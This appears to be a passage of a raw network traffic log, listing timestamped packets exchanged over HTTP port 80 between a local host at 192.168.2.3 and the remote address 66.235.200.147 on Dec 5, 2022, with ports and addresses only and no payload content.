Dec 5, 2022 01:32:37.875879049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875896931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875895977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875895977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875896931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875916958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875935078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875952005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875967026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875967979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875967026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875967026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875986099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.875996113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.875996113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876004934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876014948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876023054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876036882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876041889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876055002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876060963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876071930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876080990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876087904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876099110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876106977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876116037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876132965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876146078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876151085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876167059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876168013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876185894 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876202106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876204967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876219034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876228094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876236916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876249075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876255989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876274109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876283884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876283884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876291990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876307964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876310110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876328945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876341105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876347065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876362085 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876365900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876384020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876396894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876396894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876399994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876418114 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876419067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876434088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876437902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876447916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876456022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876462936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876475096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876491070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876492977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876508951 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876512051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876524925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876529932 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876543045 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876549006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876560926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876569986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876576900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876588106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876593113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876605988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876624107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876626015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876641989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876642942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876660109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876660109 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876678944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876682043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876682043 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876697063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876703024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876714945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876718998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876734018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876750946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876750946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876768112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876769066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876792908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876797915 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876810074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876823902 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876830101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876844883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876847982 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876863003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876867056 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876878977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876884937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876893997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876903057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876914024 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876920938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876931906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876939058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876948118 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876956940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876974106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.876974106 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.876991034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877005100 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877008915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877024889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877027035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877043962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877054930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877063990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877083063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877084970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877101898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877104998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877120018 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877120972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877135038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877140045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877150059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877157927 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877173901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877175093 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877194881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877211094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877211094 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877213001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877230883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877249002 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877264023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877266884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.877286911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.877316952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886243105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886287928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886328936 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886369944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886411905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886451960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886472940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886472940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886472940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886495113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886538029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886553049 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886579037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886590958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886620998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886646032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886662006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886679888 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886704922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886718035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886746883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886760950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886790037 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886804104 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886833906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886843920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886893988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886893988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886954069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.886962891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.886996031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887008905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887038946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887051105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887082100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887094021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887128115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887139082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887170076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887181997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887212038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887224913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887254953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887265921 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887296915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887310982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887340069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887351990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887382030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887396097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887424946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887437105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887470007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887481928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887511015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887526035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887552977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887567997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887593985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887610912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887634993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887650967 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887676954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887691975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887718916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887729883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887762070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887773991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887804985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887818098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887846947 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887860060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887888908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887901068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887932062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887945890 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.887974024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.887986898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888020039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888035059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888062954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888075113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888107061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888117075 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888149977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888163090 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888191938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888204098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888233900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888246059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888283014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888295889 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888324976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888346910 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888366938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888380051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888408899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888421059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888452053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888463020 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888494968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888505936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888535976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888550997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888577938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888591051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888619900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888633013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888660908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888674021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888703108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888715982 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888745070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888757944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888787031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888799906 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888830900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888843060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888871908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888884068 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888915062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888927937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888956070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.888968945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.888998032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889012098 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889054060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889065981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889096975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889120102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889139891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889182091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889200926 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889224052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889240026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889266014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889280081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889309883 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889323950 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889352083 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889365911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889394999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889406919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889436960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889448881 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889478922 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889496088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889520884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889535904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889561892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889589071 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889602900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889647007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889648914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889673948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889688015 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889717102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889729977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889744997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889771938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889796972 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889812946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889853954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889870882 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889895916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889916897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889939070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889961958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.889981985 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.889987946 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890022993 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890037060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890065908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890110970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890117884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890119076 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890151978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890161037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890193939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890211105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890235901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890258074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890278101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890314102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890320063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890362024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890367985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890367985 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890403986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890413046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890445948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.890460014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.890486956 CET	80	49705	66.235.200.147	192.168.2.3
